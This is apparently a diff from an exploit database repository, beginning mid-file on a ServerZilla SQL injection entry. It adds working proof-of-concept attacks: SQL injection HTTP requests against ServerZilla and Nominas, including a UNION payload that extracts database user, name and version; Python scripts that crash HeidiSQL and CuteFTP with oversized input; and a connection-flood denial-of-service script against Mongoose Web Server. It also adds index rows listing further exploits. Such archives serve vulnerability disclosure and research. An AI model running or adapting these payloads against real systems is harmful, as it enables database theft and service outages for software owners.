+# Date: 2018-11-08
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://serverzilla.sourceforge.io/
+# Software Link: https://ayera.dl.sourceforge.net/project/serverzilla/ServerZilla_src.zip
+# Version: 1.0 
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/reset.php
+# 
+POST /[PATH]/reset.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 30
+email=%27%20%4f%52%20%4e%4f%54%20%31%3d%31%2d%2d%20%45%66%65&code=
+HTTP/1.1 200 OK
+Date: Thu, 08 Nov 2018 19:57:09 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Content-Length: 1117
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8

exploits/php/webapps/45820.txt

@@ -0,0 +1,40 @@
+# Exploit Title: Nominas 0.27 - 'username' SQL Injection
+# Dork: N/A
+# Date: 2018-11-09
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://arixolab.com/proyecto.html
+# Software Link: https://netix.dl.sourceforge.net/project/nominascrm/Nominas%20v0.27.tar.gz
+# Version: 0.27
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/login/checklogin.php
+# 
+POST /[PATH]/login/checklogin.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/[PATH]/login/login.php
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 160
+username=%27+UNION+ALL+SELECT+0x31%2C0x32%2C0x33%2CCONCAT_WS%280x203a20%2CUSER%28%29%2CDATABASE%28%29%2CVERSION%28%29%29--+Ver+Ayari&password=Efe&logarse=Entrar
+HTTP/1.1 302 Found
+Date: Fri, 09 Nov 2018 23:08:26 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Set-Cookie: PHPSESSID=agq97ac0093v2f94voc6qfr7j3; path=/
+Set-Cookie: PHPSESSID=mqvaree7bi45p9q60fh2g5vhg1; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Location: ../index.php
+Content-Length: 1
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8

exploits/windows/dos/45806.py

@@ -0,0 +1,23 @@
+# Exploit Title: HeidiSQL 9.5.0.5196 - Denial of Service (PoC)
+# Discovery by: Victor Mondragón
+# Discovery Date: 2018-11-06
+# Vendor Homepage: https://www.heidisql.com/
+# Software Link: https://www.heidisql.com/download.php
+# Tested Version: 9.5.0.5196
+# Tested on: Windows 10 Single Language x64 / Windows 7 x64 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: HeidiSQL 9.5.0.5196.py
+#2.- Open bd.txt and copy content to clipboard
+#2.- Open HeidiSQL
+#3.- Select "More"
+#4.- Select "Preferences" > "Logging"
+#5.- Select "Write SQL log to file" and Paste ClipBoard
+#6.- Click on "OK"
+#7.- Crashed
+
+cod = "\x41" * 5000
+
+f = open('bd.txt', 'w')
+f.write(cod)
+f.close()

exploits/windows_x86-64/dos/45814.py

@@ -0,0 +1,28 @@
+# Exploit Title: CuteFTP 9.3.0.3 - Denial of Service (PoC)
+# Date: 2018-11-05
+# Exploit Author: Ismael Nava
+# Vendor Homepage: https://www.globalscape.com/cuteftp
+# Software Link: https://www.globalscape.com/cuteftp
+# Version: 9.3.0.3
+# Tested on: Windows 10 Home x64
+# CVE : n/a
+
+# STEPS
+# Run the python exploit script, it will create a new .txt files
+# Open the program CuteFTP
+# Copy the content of the file "Cute.txt"
+# Paste the content in the fields Host, Username and Password
+# In the field "Hostname or IP" paste the content of the file "IP.txt"
+# Click in Connect
+# End :)
+
+buffer = 'A' * 1000
+
+try: 
+    file = open("Cute.txt","w")
+    file.write(buffer)
+    file.close()
+
+    print("Archive ready")
+except:
+    print("Archive no ready")

exploits/windows_x86-64/dos/45819.py

@@ -0,0 +1,46 @@
+# Exploit Title: Mongoose Web Server 6.9 - Denial of Service (PoC)
+# Dork: N/A
+# Date: 2018-11-11
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://cesanta.com/binary.html
+# Software Link: https://backend.cesanta.com/cgi-bin/api.cgi?act=dl&os=win
+# Version: 6.9
+# Category: Dos
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+
+#!/usr/bin/python
+import socket
+
+print """
+         \\\|///
+       \\  - -  //
+        (  @ @ )
+ ----oOOo--(_)-oOOo----
+Mongoose Web Server 6.9
+    Ihsan Sencan
+ ---------------Ooooo----
+                (   )
+       ooooO     ) /
+       (   )    (_/
+        \ (
+         \_)
+"""
+Ip = raw_input("[Ip]: ")
+Port = 8080 # Default port
+ 
+d=[]
+c=0
+while 1:
+    try:
+        d.append(socket.create_connection((Ip,Port)))
+        d[c].send("BOOM")
+        print "Sie!"
+        c+=1
+    except socket.error: 
+        print "Done!"
+        raw_input()
+        break

files_exploits.csv

@@ -6182,6 +6182,9 @@ id,file,description,date,author,type,platform,port
 45792,exploits/windows_x86-64/dos/45792.py,"Blue Server 1.1 - Denial of Service (PoC)",2018-11-06,"Ihsan Sencan",dos,windows_x86-64,
 45797,exploits/windows_x86-64/dos/45797.py,"eToolz 3.4.8.0 - Denial of Service (PoC)",2018-11-06,"Ihsan Sencan",dos,windows_x86-64,
 45800,exploits/windows/dos/45800.py,"VSAXESS V2.6.2.70 build20171226_053 - 'organization' Denial of Service (PoC)",2018-11-06,"Diego Santamaria",dos,windows,
+45806,exploits/windows/dos/45806.py,"HeidiSQL 9.5.0.5196 - Denial of Service (PoC)",2018-11-12,"Victor Mondragón",dos,windows,
+45814,exploits/windows_x86-64/dos/45814.py,"CuteFTP 9.3.0.3 - Denial of Service (PoC)",2018-11-12,"Ismael Nava",dos,windows_x86-64,
+45819,exploits/windows_x86-64/dos/45819.py,"Mongoose Web Server 6.9 - Denial of Service (PoC)",2018-11-12,"Ihsan Sencan",dos,windows_x86-64,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -40314,3 +40317,15 @@ id,file,description,date,author,type,platform,port
 45801,exploits/php/webapps/45801.txt,"OpenBiz Cubi Lite 3.0.8 - 'username' SQL Injection",2018-11-06,AkkuS,webapps,php,80
 45802,exploits/php/webapps/45802.txt,"LibreHealth 2.0.0 - Arbitrary File Actions",2018-11-06,"Carlos Avila",webapps,php,80
 45803,exploits/php/webapps/45803.txt,"PlayJoom 0.10.1 - 'catid' SQL Injection",2018-11-07,"Ihsan Sencan",webapps,php,80
+45807,exploits/php/webapps/45807.txt,"Data Center Audit 2.6.2 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,
+45808,exploits/linux/webapps/45808.txt,"TufinOS 2.17 Build 1193 - XML External Entity Injection",2018-11-12,"Konstantinos Alexiou",webapps,linux,
+45809,exploits/php/webapps/45809.txt,"Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal",2018-11-12,"Pasquale Turi",webapps,php,
+45810,exploits/php/webapps/45810.txt,"Paroiciel 11.20 - 'tRecIdListe' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,
+45811,exploits/hardware/webapps/45811.rb,"TP-Link Archer C50 Wireless Router 171227 - Cross-Site Request Forgery (Configuration File Disclosure)",2018-11-12,Wadeek,webapps,hardware,
+45812,exploits/php/webapps/45812.txt,"The Don 1.0.1 - 'login' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,
+45813,exploits/php/webapps/45813.txt,"Facturation System 1.0 - 'modid' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,
+45815,exploits/php/webapps/45815.txt,"Easyndexer 1.0 - Cross-Site Request Forgery (Add Admin)",2018-11-12,"Ihsan Sencan",webapps,php,
+45816,exploits/php/webapps/45816.txt,"GPS Tracking System 2.12 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,
+45817,exploits/php/webapps/45817.txt,"ServerZilla 1.0 - 'email' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,
+45818,exploits/hardware/webapps/45818.txt,"D-LINK Central WifiManager CWM-100 - Server-Side Request Forgery",2018-11-12,hyp3rlinx,webapps,hardware,
+45820,exploits/php/webapps/45820.txt,"Nominas 0.27 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,